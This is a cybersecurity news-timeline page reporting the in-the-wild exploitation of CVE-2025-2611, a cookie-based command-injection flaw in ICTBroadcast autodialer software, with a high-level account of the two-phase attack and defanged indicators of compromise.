CyberHappenings logo

Track cybersecurity events as they unfold. Sourced timelines. Filter, sort, and browse. Fast, privacy‑respecting. No invasive ads, no tracking.

ICTBroadcast autodialer software exploited to gain remote shell access

First reported
Last updated
1 unique sources, 1 articles

Summary

Hide ▲

A critical security flaw in ICTBroadcast, an autodialer software from ICT Innovations, is being actively exploited in the wild. The vulnerability, CVE-2025-2611, allows unauthenticated remote code execution due to improper input validation of session cookie data. Attackers are using this flaw to gain remote shell access on vulnerable servers. The flaw affects ICTBroadcast versions 7.4 and below, with approximately 200 online instances exposed. The exploitation involves injecting shell commands into the BROADCAST cookie, which can then be executed on the vulnerable server. The attacks occur in two phases: a time-based exploit check followed by attempts to set up reverse shells. The attackers use a Base64-encoded command to confirm command execution and establish reverse shells.

Timeline

  1. 15.10.2025 09:16 1 articles · 23h ago

    ICTBroadcast servers exploited to gain remote shell access

    On October 11, 2025, exploitation of CVE-2025-2611 in ICTBroadcast was detected. The attacks involve injecting shell commands into the BROADCAST cookie to gain remote shell access. The exploitation occurs in two phases: a time-based exploit check followed by attempts to set up reverse shells. The attackers use a Base64-encoded command to confirm command execution and establish reverse shells. The use of a localto[.]net URL and the IP address 143.47.53[.]106 in the payloads suggests possible reuse or shared tooling with a previous campaign distributing the Ratty RAT.

    Show sources

Information Snippets